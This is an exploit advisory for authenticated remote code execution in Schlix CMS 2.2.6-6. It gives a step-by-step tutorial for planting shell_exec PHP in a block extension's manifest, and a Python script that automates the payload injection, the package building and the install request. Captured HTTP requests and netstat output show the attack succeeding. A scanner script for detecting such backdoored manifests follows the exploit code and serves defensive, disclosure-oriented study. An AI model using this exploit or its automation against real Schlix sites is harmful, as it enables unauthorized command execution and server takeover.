Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)

2021-05-06
ID: 104305
CVE: None
Download vulnerable application: None
# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==

1- Log in with an account that can reach the administration panel.
2- Go to the block management section at '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' block extension from https://github.com/calip/app_mailchimp.
5- Open the 'packageinfo.inc' file in the extension's '/blocks/mailchimp' directory.
6- Add the PHP code below before the closing '?>' tag and save the file. The CMS evaluates this manifest as PHP when it renders the block's 'About' tab, so anything placed here runs on the server.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
#####################################

7- Compress the modified extension into a ZIP archive named 'combo_mailchimp-1_0_1.zip'.
8- Install the package into the category you created, then open the installed 'mailchimp' extension.
9- Click the 'About' tab. The injected PHP code is executed and the output of 'netstat -an' is rendered in the page.
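Steps 6 to 8 of the tutorial, automated. This is an added example written for this page, not code from the advisory or from Schlix: it patches packageinfo.inc before its closing tag, repacks the block as combo_mailchimp-1_0_1.zip, and assembles the multipart body of the install request the way the captured POST below lays it out (same field names, the X-Requested-With and X-Schlix-Ajax headers, the same numeric limits). The archive layout (block folder at the top level), the SAMPLE_PACKAGEINFO text (a trimmed copy of the upstream manifest header listed further down) and the boundary string are assumptions; the CSRF token and session cookie have to come from a logged-in session, so actually sending the request is left to the caller.

```python
import io
import zipfile

PACKAGE_FILENAME = "combo_mailchimp-1_0_1.zip"
INSTALL_PATH = "/admin/app/core.blockmanager?&ajax=1&action=install"

# Constructed sample: the upstream packageinfo.inc header as listed on this
# page, with the long description dropped. Stands in for the real download.
SAMPLE_PACKAGEINFO = """<?php

$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';

?>
"""


def php_single_quoted(text: str) -> str:
    """Escape text for a PHP single-quoted literal (only backslash and ' are special)."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def inject_payload(packageinfo: str, command: str = "netstat -an") -> str:
    """Step 6: place the shell_exec payload just before the closing ?> tag.

    The manifest is plain variable assignments, so code added before the
    closing tag keeps the file valid PHP. A file without a closing tag
    gets the payload appended instead.
    """
    payload = (f"$command = shell_exec('{php_single_quoted(command)}');\n"
               'echo "<pre>$command</pre>";\n')
    head, tag, tail = packageinfo.rpartition("?>")
    if not tag:
        return packageinfo.rstrip("\n") + "\n" + payload
    return head.rstrip("\n") + "\n" + payload + tag + tail


def build_package(files: dict, top: str = "mailchimp",
                  command: str = "netstat -an") -> bytes:
    """Step 7: zip the block files ({relative/path: bytes}) with
    packageinfo.inc patched on the way in.

    Assumption: the block folder sits at the top level of the archive,
    mirroring the extension zip downloaded from GitHub.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for rel, data in sorted(files.items()):
            if rel == "packageinfo.inc":
                data = inject_payload(data.decode("utf-8"), command).encode("utf-8")
            zf.writestr(f"{top}/{rel}", data)
    return buf.getvalue()


def zip_entries(zip_bytes: bytes) -> dict:
    """Inspect a built package: {entry name: bytes}."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def build_install_request(zip_bytes: bytes, csrf_token: str, password: str,
                          boundary: str = "----schlix-install") -> tuple:
    """Step 8: headers and multipart body of the captured install POST.

    Field names, the two X- headers and the numeric limits are copied from
    the captured request; the boundary is arbitrary. 'password' is the
    logged-in user's own password, which the installer re-prompts for.
    """
    def part(name, value, filename=None, ctype=None):
        disp = f'form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        head = f"--{boundary}\r\nContent-Disposition: {disp}\r\n"
        if ctype:
            head += f"Content-Type: {ctype}\r\n"
        data = value if isinstance(value, bytes) else value.encode("utf-8")
        return head.encode("utf-8") + b"\r\n" + data + b"\r\n"

    body = b"".join([
        part("_csrftoken", csrf_token),
        part("zipfileupload", zip_bytes, PACKAGE_FILENAME, "application/x-zip-compressed"),
        part("MAX_FILE_SIZE", "2097152"),
        part("zipfileupload__total_file_size", "0"),
        part("zipfileupload__max_file_count", "20"),
        part("password", password),
    ]) + f"--{boundary}--\r\n".encode("utf-8")
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "X-Requested-With": "XMLHttpRequest",
        "X-Schlix-Ajax": "1",
    }
    return headers, body
```

To use it against a real download, read the unpacked extension directory into the `files` mapping, POST the returned body to INSTALL_PATH with the session cookie from an authenticated browser, then request the block's edit page as in the GET below; the payload output appears inside the 'About' tab markup.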

==> Modified 'packageinfo.inc' file with the injected payload (mailchimp Extension) <==

<?php

$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = '[email protected]';
$copyright = 'Copyright &copy;2019 calip';
// Injected payload: executed server-side when the block's 'About' tab is rendered
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
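Because the payload lives in the block's manifest rather than in a separate web shell, a post-incident sweep has to look inside packageinfo.inc files. The following is an added audit script, not part of the advisory or of Schlix: it treats the manifest as an allow-list of plain metadata assignments and reports every other statement, naming the dangerous call where there is one. It assumes installed blocks live under `<webroot>/blocks/<name>/packageinfo.inc`, as the path in step 5 suggests; CLEAN_MANIFEST and BACKDOORED_MANIFEST are constructed from the file listed above (description shortened), and the list of dangerous PHP functions is a general one, not something Schlix defines.

```python
import os
import re

# PHP calls that have no business in a package manifest.
DANGEROUS_CALLS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open",
                   "eval", "assert", "base64_decode", "file_put_contents",
                   "include", "include_once", "require", "require_once")

# A legitimate manifest line: $name = <string|number|bool|null>;
ASSIGNMENT = re.compile(
    r"^\$\w+\s*=\s*(?:'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"|[\d.]+|true|false|null)\s*;$",
    re.IGNORECASE)
CALL = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(", re.IGNORECASE)

# Constructed samples: the upstream manifest header listed on this page
# (description shortened) and the same file after step 6 of the tutorial.
CLEAN_MANIFEST = """<?php

$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$copyright = 'Copyright &copy;2019 calip';

?>
"""
BACKDOORED_MANIFEST = CLEAN_MANIFEST.replace(
    "\n?>", "\n$command = shell_exec('netstat -an');\necho \"<pre>$command</pre>\";\n?>")


def suspicious_lines(source: str) -> list:
    """Return (line_no, reason, text) for every line that is not a PHP tag,
    a comment, a blank, or a plain metadata assignment.

    The check is allow-list based on purpose: anything the manifest format
    does not need is reported, so the `echo` is flagged even though it
    calls nothing dangerous. Multi-line string values also show up and
    need a human look.
    """
    findings = []
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not line or line in ("<?php", "?>") or line.startswith(("//", "#", "/*", "*")):
            continue
        if ASSIGNMENT.match(line):
            continue
        hit = CALL.search(line)
        reason = f"calls {hit.group(1)}()" if hit else "not a metadata assignment"
        findings.append((no, reason, line))
    return findings


def scan_blocks_dir(blocks_dir: str) -> dict:
    """Walk <webroot>/blocks/*/packageinfo.inc and map each file that has
    findings to its list of (line_no, reason, text)."""
    report = {}
    for root, _dirs, files in os.walk(blocks_dir):
        if "packageinfo.inc" in files:
            path = os.path.join(root, "packageinfo.inc")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_lines(fh.read())
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "blocks"
    for path, hits in scan_blocks_dir(target).items():
        for no, reason, text in hits:
            print(f"{path}:{no}: {reason}: {text}")
```

Run it as `python scan_manifests.py /path/to/webroot/blocks`; a clean installation prints nothing. Pair the sweep with the web-server log: the install POST to `core.blockmanager?&ajax=1&action=install` and the later `action=edititem` GET shown below are the two requests that bracket the upload and the first execution.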

==> HTTP Request (ZIP Extension Installation) <==

POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"

a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed

(binary ZIP contents of combo_mailchimp-1_0_1.zip omitted)

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"

0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"

20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"

(your account password)
-----------------------------29322337091578227221515354130--


==> HTTP Request (RCE - About Tab) <==

GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1


==> HTTP Response (RCE - About Tab) <==

HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575

<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3307           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:50296          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:80           127.0.0.1:58843        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58853        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58854        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58859        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58860        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58865        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58868        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58883        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58893        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58894        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58899        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58902        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58908        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58918        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58919        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58924        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58886        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58887        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58888        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58891        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58905        CLOSE_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58907        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58911        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58913        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58915        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58916        TIME_WAIT
  TCP    127.0.0.1:58424        127.0.0.1:58425        ESTABLISHED
  TCP    127.0.0.1:58425        127.0.0.1:58424        ESTABLISHED
  TCP    127.0.0.1:58435        127.0.0.1:58436        ESTABLISHED
  TCP    127.0.0.1:58436        127.0.0.1:58435        ESTABLISHED
  TCP    127.0.0.1:58565        127.0.0.1:58566        ESTABLISHED
  TCP    127.0.0.1:58566        127.0.0.1:58565        ESTABLISHED
  TCP    127.0.0.1:58639        127.0.0.1:58640        ESTABLISHED
  TCP    127.0.0.1:58640        127.0.0.1:58639        ESTABLISHED
  TCP    169.254.22.167:139     0.0.0.0:0              LISTENING
  TCP    169.254.224.26:139     0.0.0.0:0              LISTENING
  TCP    192.168.1.8:139        0.0.0.0:0              LISTENING
  TCP    192.168.1.8:49500      95.101.14.77:443       ESTABLISHED
  TCP    192.168.1.8:57059      162.159.129.235:443    ESTABLISHED
  TCP    192.168.1.8:57902      162.159.138.234:443    ESTABLISHED
  TCP    192.168.1.8:58453      44.235.189.138:443     ESTABLISHED
  TCP    192.168.1.8:58626      162.159.138.232:443    ESTABLISHED
  TCP    192.168.1.8:58627      162.159.133.234:443    ESTABLISHED
  TCP    192.168.1.8:58699      162.159.135.232:443    ESTABLISHED
  TCP    192.168.1.8:58841      20.44.232.74:443       ESTABLISHED
  TCP    192.168.1.8:58942      162.159.138.232:443    ESTABLISHED
  TCP    192.168.1.8:58951      138.68.92.190:443      ESTABLISHED
  TCP    192.168.1.8:60549      51.103.5.159:443       ESTABLISHED
  TCP    192.168.1.8:60610      104.66.70.197:443      ESTABLISHED
  TCP    192.168.1.8:60611      104.66.70.197:443      ESTABLISHED
  TCP    192.168.1.8:60612      217.31.233.104:443     CLOSE_WAIT
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:3306              [::]:0                 LISTENING
  TCP    [::]:3307              [::]:0                 LISTENING
  TCP    [::]:7680              [::]:0                 LISTENING
  TCP    [::]:49664             [::]:0                 LISTENING
  TCP    [::]:49665             [::]:0                 LISTENING
  TCP    [::]:49666             [::]:0                 LISTENING
  TCP    [::]:49667             [::]:0                 LISTENING
  TCP    [::]:49668             [::]:0                 LISTENING
  TCP    [::]:50296             [::]:0                 LISTENING
  TCP    [::1]:3306             [::1]:58845            TIME_WAIT
  TCP    [::1]:3306             [::1]:58856            TIME_WAIT
  TCP    [::1]:3306             [::1]:58857            TIME_WAIT
  TCP    [::1]:3306             [::1]:58858            TIME_WAIT
  TCP    [::1]:3306             [::1]:58932            TIME_WAIT
  TCP    [::1]:3306             [::1]:58935            TIME_WAIT
  TCP    [::1]:3306             [::1]:58940            TIME_WAIT
  TCP    [::1]:3306             [::1]:58950            TIME_WAIT
  TCP    [::1]:3306             [::1]:58953            ESTABLISHED
  TCP    [::1]:3306             [::1]:58954            ESTABLISHED
  TCP    [::1]:49485            [::1]:49486            ESTABLISHED
  TCP    [::1]:49486            [::1]:49485            ESTABLISHED
  TCP    [::1]:49669            [::]:0                 LISTENING
  TCP    [::1]:58844            [::1]:3306             TIME_WAIT
  TCP    [::1]:58845            [::1]:3306             TIME_WAIT
  TCP    [::1]:58855            [::1]:3306             TIME_WAIT
  TCP    [::1]:58856            [::1]:3306             TIME_WAIT
  TCP    [::1]:58857            [::1]:3306             TIME_WAIT
  TCP    [::1]:58858            [::1]:3306             TIME_WAIT
  TCP    [::1]:58861            [::1]:3306             TIME_WAIT
  TCP    [::1]:58862            [::1]:3306             TIME_WAIT
  TCP    [::1]:58863            [::1]:3306             TIME_WAIT
  TCP    [::1]:58864            [::1]:3306             TIME_WAIT
  TCP    [::1]:58866            [::1]:3306             TIME_WAIT
  TCP    [::1]:58867            [::1]:3306             TIME_WAIT
  TCP    [::1]:58869            [::1]:3306             TIME_WAIT
  TCP    [::1]:58870            [::1]:3306             TIME_WAIT
  TCP    [::1]:58884            [::1]:3306             TIME_WAIT
  TCP    [::1]:58885            [::1]:3306             TIME_WAIT
  TCP    [::1]:58929            [::1]:3306             TIME_WAIT
  TCP    [::1]:58930            [::1]:3306             TIME_WAIT
  TCP    [::1]:58931            [::1]:3306             TIME_WAIT
  TCP    [::1]:58932            [::1]:3306             TIME_WAIT
  TCP    [::1]:58934            [::1]:3306             TIME_WAIT
  TCP    [::1]:58935            [::1]:3306             TIME_WAIT
  TCP    [::1]:58939            [::1]:3306             TIME_WAIT
  TCP    [::1]:58940            [::1]:3306             TIME_WAIT
  TCP    [::1]:58946            [::1]:3306             TIME_WAIT
  TCP    [::1]:58947            [::1]:3306             TIME_WAIT
  TCP    [::1]:58949            [::1]:3306             TIME_WAIT
  TCP    [::1]:58950            [::1]:3306             TIME_WAIT
  TCP    [::1]:58953            [::1]:3306             ESTABLISHED
  TCP    [::1]:58954            [::1]:3306             ESTABLISHED
  UDP    0.0.0.0:5050           *:*                    
  UDP    0.0.0.0:5353           *:*                    
  UDP    0.0.0.0:5355           *:*                    
  UDP    0.0.0.0:53240          *:*                    
  UDP    0.0.0.0:53241          *:*                    
  UDP    127.0.0.1:1900         *:*                    
  UDP    127.0.0.1:62353        *:*                    
  UDP    127.0.0.1:63129        *:*                    
  UDP    192.168.1.8:137        *:*                    
  UDP    192.168.1.8:138        *:*                    
  UDP    192.168.1.8:1900       *:*                    
  UDP    192.168.1.8:2177       *:*                    
  UDP    192.168.1.8:63128      *:*                    
  UDP    [::]:5353              *:*                    
  UDP    [::]:5355              *:*                    
  UDP    [::1]:1900             *:*                    
  UDP    [::1]:63125            *:*                                
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:1900  *:*                    
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:2177  *:*                    
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:63124  *:*                    
</pre>
<div class="content">
    <div class="row">
        <div class="col-xs-12">
            <div class="text-center">
                <h1>mailchimp</h1>
                <p>v1.0</p><p>Author: <a href="mailto:[email protected]">Alip</a></p> 
                <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> 
                <p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
            </div>
         </div>         
    </div>          
</div>
</div>
</body>